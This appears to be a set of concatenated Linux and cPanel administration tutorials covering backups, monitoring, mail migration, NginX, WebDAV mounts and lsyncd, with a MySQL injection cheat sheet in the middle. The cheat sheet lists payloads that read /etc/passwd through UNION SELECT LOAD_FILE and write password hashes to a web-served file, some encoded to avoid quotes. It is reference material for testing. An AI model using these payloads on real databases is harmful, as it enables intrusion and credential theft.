cPanel: Auto Backup and Remote Transfer using API + PHP

The good thing about cPanel is you can generate your own backup automatically using cPanel API. In this case, we will use PHP to run on schedule to automatically generate backup and transfer via FTP or SCP to another server. This implementation can be done on user level without need to login into cPanel login page.

To integrate with cPanel API, we need a file xmlapi.php which we can get from cPanel GitHub repository at https://github.com/CpanelInc/xmlapi-php. This post is about creating full backup and transfer the backup to a remote location using FTP automatically with cPanel under user privileges, not root privileges. Variable as below:

cPanel: WHM 11.30.6 (build 6)
cPanel user: mycp123
cPanel password: Pas$r12cP
Domain: mycp123.org
Home directory: /home/mycp123

1. Download the PHP API at here https://github.com/CpanelInc/xmlapi-php/downloads. For me I will download the zip format into my local desktop. Unzip it. Inside the folder got several files and folders. We just need to upload xmlapi.php into public_html folder using FTP client.

2. I am login into cPanel to create PHP script by using File Manager. Go to cPanel > File Manager > Web Root > Go > New File > File Name: cpbackup.php > Create New File.

3. Open back the file in text editor mode by right click on the file (cpbackup.php) and select Code Edit > Edit. It should open cPanel code editor. Copy following lines and save:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
// Must include cPanel API
include "xmlapi.php";
 
// Credentials for cPanel account
$source_server_ip = ""; // Server IP or domain name eg: 212.122.3.77 or cpanel.domain.tld
$cpanel_account = ""; // cPanel username
$cpanel_password = ""; // cPanel password
 
// Credentials for FTP remote site
$ftphost = ""; // FTP host IP or domain name
$ftpacct = ""; // FTP account
$ftppass = ""; // FTP password
$email_notify = ''; // Email address for backup notification
 
$xmlapi = new xmlapi($source_server_ip);
$xmlapi->password_auth($cpanel_account,$cpanel_password);
$xmlapi->set_port('2083');
 
// Delete any other backup before create new backup
$conn_id = ftp_connect($ftphost);
$login_result = ftp_login($conn_id, $ftpacct, $ftppass);
$logs_dir = "/";
 
ftp_chdir($conn_id, $logs_dir);
$files = ftp_nlist($conn_id, ".");
foreach ($files as $file){
    ftp_delete($conn_id, $file);
}
 
ftp_close($conn_id);
 
$api_args = array(
                           'passiveftp',
                           $ftphost,
                           $ftpacct,
                           $ftppass,
                           $email_notify,
                            21,
                            '/'
                         );
 
$xmlapi->set_output('json');
print $xmlapi->api1_query($cpanel_account,'Fileman','fullbackup',$api_args);
 
?>

4. Update the credentials details between line 5 to 15 in the script and save it.

Notes:
The script will check whether any backup exists in destination server and will delete all of them (line 21 to 31). Then, using cPanel API we can create an argument as refer to here http://docs.cpanel.net/twiki/bin/view/ApiDocs/Api1/ApiFileman#Fileman::fullbackup to use passive FTP as transfer mode at line 34 when the backup is ready.

5. We can execute this task manually by accessing the PHP file via browser at http://www.mycp123.org/cpbackup.php. You should see JSON output will be return as below if successful:

{"apiversion":"1","type":"event","module":"Fileman","func":"fullbackup","source":"module","data":{"result":""},"event":{"result":1}}

6. To automate this task, we can simply create cron job to run it weekly. Go to cPanel > Advanced > Cron jobs and use following command:

php -q /home/mycp123/public_html/cpbackup.php

Screen shot as below:

Done! You can create many scripts using cPanel API to automate your repeated task.

cPanel: Trigger Alert from Munin

For cPanel servers, Munin is one of important plugin that need to be enabled in the server. cPanel has provide this plugin to be install with just one click under WHM > cPanel > Manage Plugins > Munin. We can monitor and understand what is going on with our server resources while predicting future problems like hard disk temperature, available disk space, mysql throughput and many more.

As for me, we can take advantage of this monitoring tools to send me alert via email on certain critical services like Apache processes, Exim mail queue and load average of the server. I will use following information to configure Munin:

Email to: [email protected]
Server hostname: myserver.supercone.com
Service need to monitor: Apache processes, mail queue, load average
Alerting level: warning and critical

Apache processes

Usually when the server being attacked via port 80 or 443, it will fully utilize the whole Apache slot. Default cPanel Apache configuration will allow 256 process to be run and the normal usage for this server is below 50 processes. This is represented in Munin under plugin apache_processes under /etc/munin/plugins/apache_processes and can be access in WHM > Plugins > Munin Service Monitor > ::Apache processes as refer to following screen shot:

If you see the picture above, I will need to monitor busy80 by specifying 50 processes as warning and 180 processes as critical:

apache_processes.busy80.warning 50
apache_processes.busy80.critical 180

Exim mail queue

Mail queue monitor is to help us prevent from getting spammed or become spammer. We surely not aware how our mail users use their mailbox and some of them might have their account compromised and being used to spam mails by spammer. If your mail queue is higher than usual, something not good is leading towards you. You might be accused to be hosting spammer, server IP being blacklisted by anti-spam organization and server connection’s might have been blocked to connect to others.

Exim mail queue is being monitor by Munin by a plugin called exim_mailqueue under /etc/munin/plugins/exim_mailqueue. You can access it in browser at WHM > Plugins > Munin Service Monitor > ::Exim Mailqueue as refer to following screenshot:

As you can see that my mail queue average is 480 mails. I will need to monitor mails by specifying 500 as warning and 1000 as critical:

exim_mailqueue.mails.warning 500
exim_mailqueue.mails.critical 1000

Load average

This is the most important part on checking up the stability of a server. Load average is a value that represent your server work load over a period of time. From the Munin monthly load average, I can see my server is running on 0.82 average:

My warning value should be 4 and critical is 8 (usually no of CPU x 2).

load.load.warning 4
load.load.critical 8

Munin Alert

Munin configuration file in cPanel is located under /etc/munin/munin.conf. Open this file via text editor and add following line:

contact.me.command mail -s "Munin notification ${var:host}" webmaster_99@live.com
contact.me.always_send warning critical

This will enable email notification with warning and critical status. Now, we need to configure which monitoring plugins that we want to trigger alert as what we have describe above. In the same file, you should notice following line:

[myserver.supercone.com]
     address 127.0.0.1
     use_node_name yes

Add all the warning and critical triggers (as describe above) under this directive as below:

[myserver.supercone.com]
     address 127.0.0.1
     use_node_name yes
     apache_processes.busy80.warning 50
     apache_processes.busy80.critical 180
     exim_mailqueue.mails.warning 500
     exim_mailqueue.mails.critical 1000
     load.load.warning 4
     load.load.critical 8

Save and restart munin-node service:

$ service munin-node restart

From now on, you will receive email like below if warning or critical alerts triggered:

supercone.com :: myserver.supercone.com :: Apache processes
     WARNINGs: busy servers 80 is 112.83 (outside range[:50]).

cPanel: Install PHP SSH2 Module

One of my developer required PHP SSH2 module to be loaded into the cPanel server. Since this module is not available inside EasyApache, I need to install it separately and integrate to the current configuration that we have build using EasyApache.

1. Download and install libssh2 from this website, http://www.libssh2.org/snapshots/

$ cd /usr/local/src
$ wget http://www.libssh2.org/snapshots/libssh2-1.4.0-20120319.tar.gz
$ tar -xzf libssh2-1.4.0-20120319.tar.gz
$ cd libssh2-*
$ ./configure
$ make all install

2.  Before we install ssh2 module, we need to know where the PHP extension_dir location:

$ php -i | grep extension_dir
/usr/local/lib/php/extensions/no-debug-non-zts-20090626

3. Then, download PECL ssh2 module from here, http://pecl.php.net/package/ssh2 and install the module:

$ cd /usr/local/lib/php/extensions/no-debug-non-zts-20090626
$ wget http://pecl.php.net/get/ssh2/
$ tar -xzf ssh2-0.11.3.tgz
$ mv ssh2-0.11.3 php-ssh2
$ cd php-ssh2
$ phpize
$ ./configure --with-ssh2
$ make
$ make install

4. Now we need to enable the module in php.ini. Retrieve the php.ini location:

$ php -i | grep "Loaded Configuration File"
 Loaded Configuration File => /usr/local/lib/php.ini

And run following command to map the extension into PHP:

$ echo "extension=ssh2.so" >> /usr/local/lib/php.ini

5. Restart Apache web server (if you are using DSO):

$ service httpd restart

Done! You can check if SSH2 module is loaded or not by using following command:

$ php -i | grep ssh2
Registered PHP Streams => compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip, ssh2.shell, ssh2.exec, ssh2.tunnel, ssh2.scp, ssh2.sftp
ssh2
libssh2 version => 1.4.0-20120319
banner => SSH-2.0-libssh2_1.4.0-20120319
PWD => /usr/local/lib/php/extensions/no-debug-non-zts-20090626/php-ssh2
_SERVER["PWD"] => /usr/local/lib/php/extensions/no-debug-non-zts-20090626/php-ssh2
_ENV["PWD"] => /usr/local/lib/php/extensions/no-debug-non-zts-20090626/php-ssh2

Email Migration without Downtime

I have been assigned a task by the big boss to do our company’s email migration without any downtime. Downtime in this case is refer to the time when MX record pointing propagates around the world to the new server. It could cause your emails to be sent to the old server, instead of the new server until the client DNS server clear their DNS cache of the host record.

To achieve this, we need to have a server in between to be the store-and-forward mail server aka backup MX server. Point the MX record to this server and then we change the forwarding IP from old server to the new server. So every new email will be sent directly to the new server without any propagation delay. Following picture shows what will be happened when migrating email server:

I am using following variables:

Backup MX Server: 211.44.22.100
Backup MX OS: CentOS 6.2 64bit
Old mail server: 182.22.60.20
New mail server: 60.1.222.100
Domain: mygreek.biz

Backup MX server

1. To eliminate DNS propagation during migration, we will need to setup a backup MX server at least 3 days before the migration been scheduled. We will use Postfix, a mail transfer agent to serve as store-and-forward mail server. Install Postfix via yum, turn off sendmail and SELINUX:

$ setenforce 0
$ service sendmail stop
$ chkconfig sendmail off
$ yum install -y postfix

2. Edit /etc/postfix/main.cf using text editor as below:

myhostname = forwarder.mygreek.biz   #server hostname
mydomain = localhost
myorigin = $mydomain
inet_interfaces = all                #listen to all available IPs
mydestination = $myhostname, localhost.$mydomain, $mydomain
mynetworks_style = host
relay_domains = mygreek.biz
transport_maps = hash:/etc/postfix/transport

3. Open /etc/postfix/transport to setup the forwarding for relayed domain. Point it to the old server:

mygreek.biz smtp:[182.22.60.20]

4. Activate the Postfix map, start the Postfix service and enable the service on boot:

$ postmap /etc/postfix/transport
$ chkconfig postfix on
$ service postfix start

Backup MX should able to receive and forward emails to the old mail server now. Dont forget to allow port 25 via IPtables so Postfix can run smoothly.

MX record in NS

Once the backup MX server ready, we then need to update the MX records in the name server. Login into the name server and update the MX records and point it to this backup MX:

mygreek.biz.    MX    10    mail.mygreek.biz.
mail             A          211.44.22.100

Make sure you are doing this at least 3 days before the migration start to avoid DNS propagation affect the migration.

Migrating Email

1. Before we start the migration, we will need to stop old server mail service. Since the old server is using cPanel, I will need to stop and disable Exim service so backup MX can take over to store the email in queue until the new mail server up:

WHM > Service Configuration > Service Manager > Unchecked “Enabled” and “Monitor” for Exim > Save

2. I will use cPanel migration utility called “Copy an account from another server”. Just follow the wizard and wait until the account copy complete.

3. Once the email migration completed, we then need to update the forwarding IP in the backup MX to the new server. Login into the backup MX server and edit /etc/postfix/transport:

mygreek.biz smtp:[60.1.222.100]

Then, update the Postfix mapping and restart the service to push the emails in queue to the new mail server:

$ postmap /etc/postfix/transport
$ service postfix restart

In new server, you will notice that you will start to receive emails which already in queue from backup MX server. This will guarantee no lost email and eliminate email being sent to the old server.

Completing the Migration

Monitor the email flow for a while and make sure all emails are delivered to the recipient respectively. If everything run smoothly, it is time to update the MX record and point it to the new mail server so we can remove the MX backup server later:

mygreek.biz.    MX    10    mail.mygreek.biz.
mail             A          60.1.222.100

Please allow the MX backup server to run at least 3 days to make sure new MX has propagated around the world. To double confirm on this, you can use this website to check whether your mail host has been propagated or not:

http://www.whatsmydns.net/

If everything run smoothly, you can shut down and remove the backup MX server and migration consider completed.

Web Server Benchmarking using Apache Benchmark and gnuplot

Apache Benchmark (aka ab) is a tool to benchmark the HTTP web server. It is recommended to test your web server performance before switch it to production environment. I am using this tools to benchmark and do some stress test to our development server before it goes live.

Make sure you have following points prepared before we do benchmarking:

  • URL is accessible via public domain or IP: http://blog.secaserver.com
  • Expect number of clients that your server ready to serve: 50 concurrent users/seconds
  • Expect number of requests per client that your server ready to serve: 10 requests/user/seconds
  • Verify whether keepalived is supported. You can use phpinfo or examine the server header: Keepalived supported
  • How the output should be present: Graph

I will use terminal server CentOS to do this benchmarking remotely. This test should be done at least 3 times so we can see the pattern. We will use gnuplot to present the data in graph. So we need to export the Apache benchmark output to a file that gnuplot understand  in TSV format (tab separated values) called bench1.tsv, and the next test will use respective number like bench2.tsv and so on.

1. Install required tools using yum. We will need to install httpd and gnuplot:

$ yum install -y httpd httpd-tools gnuplot

2. For first test, we can start to do benchmarking by using following command:

$ ab -c 10 -n 50 -k -g /var/www/html/bench1.tsv http://blog.secaserver.com/

Repeat the step above for 2nd and 3rd test using following command:

$ ab -c 10 -n 50 -k -g /var/www/html/bench2.tsv http://blog.secaserver.com/
$ ab -c 10 -n 50 -k -g /var/www/html/bench3.tsv http://blog.secaserver.com/

3. Now TSV files ready to be plot. Lets generate the graph in PNG format:

$ cd /var/www/html
$ gnuplot

You will be entering gnuplot console mode. Run following command to generate the image:

gnuplot> set terminal png
Terminal type set to 'png'
gnuplot> set output "benchmark.png"
gnuplot> set title "Benchmark for blog.secaserver.com"
gnuplot> set size 1,1
gnuplot> set grid y
gnuplot> set xlabel 'Request'
gnuplot> set ylabel 'Response Time (ms)'
gnuplot> plot "bench1.tsv" using 10 smooth sbezier with lines title "Benchmark 1:", "bench2.tsv" using 10 smooth sbezier with lines title "Benchmark 2:", "bench3.tsv" using 10 smooth sbezier with lines title "Benchmark 3:"
gnuplot> exit

Done! You should now able to see the image via browser. Example benchmarking output as below:

Notes

We can create a template script for gnuplot to simplify the process to generate graph. Following template is the same action performed as step #3. We will name this template files as benchmark.tpl:

# output as png image
set terminal png
 
# save file to "benchmark.png"
set output "benchmark.png"
 
# graph title
set title "Benchmark for blog.secaserver.com"
 
# aspect ratio for image size
set size 1,1
 
# enable grid on y-axis
set grid y
 
# x-axis label
set xlabel "Request"
 
# y-axis label
set ylabel "Response Time (ms)"
 
# plot data from bench1.tsv,bench2.tsv and bench3.tsv using column 10 with smooth sbezier lines
plot "bench1.tsv" using 10 smooth sbezier with lines title "Benchmark 1:", \
"bench2.tsv" using 10 smooth sbezier with lines title "Benchmark 2:", \
"bench3.tsv" using 10 smooth sbezier with lines title "Benchmark 3:"

To execute the template, just run following command:

$ gnuplot benchmark.tpl

If you examine TSV files created by ab, you should the column header which is ctime, dtime, ttime and wait. Definition as below:

ctime: Connection Time
dtime: Processing Time
ttime: Total Time
wait: Waiting Time

Customize Server Header using NginX

Whenever you browse a website, you can check the type of web server running by retrieving the response server header. For example, by using this website, http://serverheader.com/header/form.html following server response return for website www.opensource.org :

HTTP/1.1 200 OK
Date: Tue, 13 Mar 2012 03:44:54 GMT
Server: Apache/2.2.22 (FreeBSD) DAV/2 SVN/1.7.3 mod_ssl/2.2.22 OpenSSL/1.0.0g
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=tul1j9kd7mme2r01up3lbq8326; expires=Thu, 05-Apr-2012 07:18:14 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 13 Mar 2012 03:32:52 GMT
ETag: "ab9ee40bb417fbfde83d38a6d6f4754b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

From the information we can know that the web server is running on Apache version 2.2.22, run on FreeBSD and have certain module enabled like webdav, svn, mod_ssl and openSSL.

Actually, by using NginX, you can personalize and customize your server header to the name that you want. For example, instead of showing the real web server name which is “nginx“, I want users to see the web server name as “My Web Server“.

I will using following variables to test:

OS: CentOS 6.2 64bit
NginX version: 1.0.13
Web directory: /home/mywebs/public_html
Domain: mywebserver.net

1. Install all dependencies using yum:

$ yum install -y lynx pcre* openssl* zlib*

2. Download and install NginX and its requirement from source:

$ cd /usr/local/src
$ wget http://nginx.org/download/nginx-1.0.13.tar.gz
$ tar -xzf  nginx-1.0.13.tar.gz
$ cd nginx-*
$ ./configure
$ make
$ make install

3.  Download NginX headers-more module from this website: https://github.com/agentzh/headers-more-nginx-module/tags. I will be using the latest version at this moment which is v0.17rc1 and need to download this module using lynx:

$ cd /usr/local/src
$ lynx https://github.com/agentzh/headers-more-nginx-module/zipball/v0.17rc1

You will need to press “D” > Enter > and select “Save to disk” using arrow on keyboard to download the file > Enter > press ‘q’ to quit and ‘y’ to confirm the action. You should see a new .zip file once completed.

4. We need to unzip, rename and put move the directory to modules directory under NginX directory. Since this directory is not exist in the first place, we need to create it first:

$ mkdir /usr/local/nginx/mod
$ unzip agentzh-headers-more-nginx-module-v0.17rc1-0-g3580526.zip
$ mv agentzh-headers-more-nginx-module-3580526 headers-more
$ mv headers-more /usr/local/nginx/mod

5.  Now we need to recompile NginX with the module. Actually, you can just install it directly with NginX and point it to the module directory separately. But I want NginX and module installation to be organized so I install NginX first and then I recompile it again with this  module.

$ cd /usr/local/src/nginx*
$ ./configure --add-module=/usr/local/nginx/mod/headers-more/
$ make
$ make install

6.  As what variables stated above, I will need to configure NginX to listen to domain mywebserver.net and mapped to /home/myweb/public_html. So I will create a user who own this directory:

$ useradd -m mywebs
$ mkdir /home/mywebs/public_html | mkdir /home/mywebs/logs
$ touch /home/mywebs/logs/access_log | touch /home/mywebs/logs/error_log
$ chown mywebs.mywebs * -R
$ chmod 755 /home/mywebs

7. Make some changes to NginX configuration files which located under /usr/local/nginx/conf/nginx.conf as below:

user  nobody;
worker_processes  1;
 
error_log  logs/error.log  info;
 
events {
    worker_connections  1024;
}
 
http {
    #this is your web server name
    more_set_headers    "Server: My Web Server";
    server_names_hash_max_size 2048;
    include       mime.types;
    default_type  application/octet-stream;
 
    log_format   main '$remote_addr - $remote_user [$time_local]  $status '
    '"$request" $body_bytes_sent "$http_referer" '
    '"$http_user_agent" "$http_x_forwarded_for"';
 
    sendfile        on;
    tcp_nopush     on;
 
    keepalive_timeout  10;
 
    gzip  on;
 
 server {
 
  # this is your access logs location
  access_log /home/mywebs/logs/access_log;
  # this is your error logs location
  error_log  /home/mywebs/logs/error_log warn;
  listen    80;
  # change to your domain
  server_name  mywebserver.net www.mywebserver.net;
 
  location / {
   # this is your public_html directory
   root   /home/mywebs/public_html;
   index  index.html index.htm;
  }
 }
}

8. Before we start the NginX, make sure we check the configuration syntax:

$ /usr/local/nginx/sbin/nginx -t

9. If everything is okay, we can start the web server:

$ /usr/local/nginx/sbin/nginx

Done. Now you can check the server header and you will notice that your customize web server name has appeared at the “Server” section. I have checked using Chrome extension called “Domain Details” and my new server header is:

Date: Tue, 13 Mar 2012 04:50:14 GMT
Connection: keep-alive
Content-Length: 23
Last-Modified: Tue, 13 Mar 2012 04:29:33 GMT
Server: My Web Server
Content-Type: text/html
Accept-Ranges: bytes

If I add following line into NginX configuration files:

more_clear_headers   "Content-Type: ";
more_clear_headers   "Accept-Ranges: ";
more_clear_headers   "Content-Length: ";

After NginX restart, the full server header will be returned as below:

Date: Tue, 13 Mar 2012 04:50:14 GMT
Connection: keep-alive
Last-Modified: Tue, 13 Mar 2012 04:29:33 GMT
Server: My Web Server

For more information on the more-headers usage, you can refer to this page:

http://wiki.nginx.org/HttpHeadersMoreModule

Linux: Mount Box.net Account Locally

Cloud storage nowadays has create a trend on storing and accessing data from any where around the world. 2 most popular cloud storage providers are Dropbox and Box.net. In this post, I am going to show you on how to mount Box.net account inside the Linux box. You are required to have a Box.net account, which is free if you register for personal plan and it comes with 5 GB online storage space.

We will use davfs2 to mount Box.net account via WebDAV. Dropbox do not offer this feature at the moment. Variable that I used as follows:

OS: CentOS 6.2 64bit
Box.net username: [email protected]
Box.net password: MyGu1234
Mount point: /mnt/box/

1. To use the simplest way on installation, we will use RPMforge repository:

$ cd /usr/local/src
$ rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt
$ wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm
$ rpm -K rpmforge-release-0.5.2-2.el6.rf.x86_64.rpm

2. Once done, lets install davfs2 via yum:

$ yum install -y davfs2

3. Create the mount point:

$ mkdir /mnt/box

4. Add following line to /etc/fstab:

https://www.box.com/dav    /mnt/box    davfs    rw,user,noauto 0 0

5. Add Box.net account information into /etc/davfs2/secrets using text editor:

https://www.box.com/dav  [email protected]  MyGu1234

Notes: If you use special characters in your password use a forward slash in front of the special character (thanks to Keith for this highlight)

6. Change the lock mechanism of mounted filesystem. Open /etc/davfs2/davfs2.conf and find following value:

#use_locks    1

And change to:

use_locks     0

7. Mount the partition:

$ mount /mnt/box

Done! Now you can start to sync your files to your cloud storage by copying the files into /mnt/box directory. Login into Box.net account and verify that the files should be existed. Depending on the file size, you might need to wait for a while after copying process complete before it appears in the Box.net account.

Following screenshot is the Box.net account. I just sync my public_html backup files to the cloud storage.

Happy ‘clouding’. Cheers!

Basic MySQL Injection Cheat Sheet

Version

SELECT @@version;

Comments

SELECT 1; #comment
SELECT /*comment*/1;

Current User

SELECT user();
SELECT system_user();

List Users

SELECT user FROM mysql.user;

List Password Hashes

SELECT host, user, password FROM mysql.user;

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;

List privileges for the user on column:

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';

Current Database

SELECT database();

List Databases

SELECT schema_name FROM information_schema.schemata;
SELECT DISTINCT(db) FROM mysql.db;

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

Select Nth Row

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered 1
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered 2

Select Nth Char

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT CHAR(65); # returns A

Char -> ASCII Value

SELECT ASCII('A'); # returns 65

Casting

SELECT CAST('1' AS unsigned integer); # returns 1
SELECT CAST('123' AS char); # returns 123

String Concatenation

SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT IF(1=1,'foo','bar'); # returns 'foo'
SELECT IF(1=2,'foo','bar'); # returns 'bar

Case Statement

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
SELECT CASE WHEN (1=2) THEN 'A' ELSE 'B' END; # returns B

Avoiding Quotes

SELECT 0x414243; # returns ABC using hexadecimal

Time Delay

SELECT BENCHMARK(1000000,MD5('A'));

Local File Access

...' UNION ALL SELECT LOAD_FILE('/etc/passwd')
SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Create Users

CREATE USER test1 IDENTIFIED BY 'pass1';

Delete Users

DROP USER test1;

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO [email protected]'%';

Location of DB files

SELECT @@datadir;

Write query result into file

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt';

Write query result into file without single quotes

SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(114),CHAR(111),CHAR(111),CHAR(116),CHAR(39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(47),CHAR(116),CHAR(109),CHAR(112),CHAR(47),CHAR(112),CHAR(97),CHAR(115),CHAR(115),CHAR(101),CHAR(115),CHAR(46),CHAR(116),CHAR(120),CHAR(116),CHAR(39));

Above query is equal to:

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/tmp/passes.txt';

Linux: Using lsyncd – Live Syncing (Mirror) Daemon

I have a situation where there is one critical website under our company server is critically need to be sync to our backup server. Sync means whatever changes happen in master server, it will replicated to slave server. Yes, you can rsync. But, I do not want to schedule the task as cron to sync. There is one tool which is better than that and very suitable to be applied in this situation called lsyncd.

Lsyncd watches a local directory trees event monitor interface (inotify or fsevents). It aggregates and combines events for a few seconds and then spawns one (or more) process(es) to synchronize the changes. By default this is rsync. Lsyncd is thus a light-weight live mirror solution that is comparatively easy to install not requiring new filesystems or blockdevices and does not hamper local filesystem performance.

OS: RHEL 5.3 (Tikanga) 64bit
Source IP: 192.168.50.10
Source directory: /home/webmedia/public_html
Destination IP: 102.168.50.20
Destination directory: /backup/webmedia/public_html

Destination server

In destination server, we just need to make sure that the destination directory is exist. If not, create the destination folder:

$ mkdir -p /backup/webmedia/public_html

Source server

1. It is good to have embedded host value that point to the IP address. Open /etc/hosts and add destination host value:

192.168.50.20   backup-server.local

2. We need to allow passwordless authentication to the destination server. We will using root user to execute the sync process. Run following command as root:

$ ssh-keygen -t dsa

Please enter for all prompts. Once done, run following command to copy the public key to destination server:

$ cat ~/.ssh/id_dsa.pub | ssh root@backup-server.local “cat >> ~/.ssh/authorized_keys”

Or we can use another command which do the same thing called ssh-copy-id:

$ ssh-copy-id -i ~/.ssh/id_dsa root@backup-server.local

Once done, try to access the destination server with following command. Make sure you can access the server without any password prompted:

$ ssh root@backup-server.local

3. Lsyncd required LUA to be installed. For latest RedHat distribution (RHEL 6) you can use yum to install:

$ yum install -y lua*

In my case, I am using the RHEL 5, and the packages are not available at yum. So I will need to find another place for RPM which is here: http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/

Download these 3 packages and install:

  1. lua-5.1.4-1.el5.art.x86_64.rpm
  2. lua-static-5.1.4-1.el5.art.x86_64.rpm
  3. lua-devel-5.1.4-1.el5.art.x86_64.rpm
$ mkdir -p /usr/local/src/lua
$ cd /usr/local/src/lua
$ wget http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/lua-5.1.4-1.el5.art.x86_64.rpm
$ wget http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/lua-devel-5.1.4-1.el5.art.x86_64.rpm
$ wget http://www6.atomicorp.com/channels/atomic/centos/5/x86_64/RPMS/lua-static-5.1.4-1.el5.art.x86_64.rpm
$ rpm -Uhv *.rpm

4. Download and install lsyncd from this website: http://code.google.com/p/lsyncd/downloads/list:

$ cd /usr/local/src
$ wget http://lsyncd.googlecode.com/files/lsyncd-2.0.6.tar.gz
$ tar -xzf  lsyncd-2.0.6.tar.gz
$ cd lsyncd-*
$ ./configure
$ make 
$ make install

5. Once done, start the daemon in the source server by using this command:

$ lsyncd -rsyncssh /home/webmedia/public_html root@backup-server.local /backup/webmedia/public_html

Done. The file should be in sync now. You can check the process using ‘ps‘ command and monitor the progress by constantly viewing the destination directory. In some cases, the sync terminate immediately with following error at /var/log/message:

lsyncd: Error, Consider increasing /proc/sys/fs/inotify/max_user_watches

Depending on the directory that you are watching, you might need to increase the max_user_watches to higher value using following command:

$ echo 65500 > /proc/sys/fs/inotify/max_user_watches

Once the synchronization complete, you can make some test by add more files in the source server, after 5 seconds you will see that the files has been synced to the destination directory. To make this daemon run automatically after boot, you can put the lsyncd command into /etc/rc.local.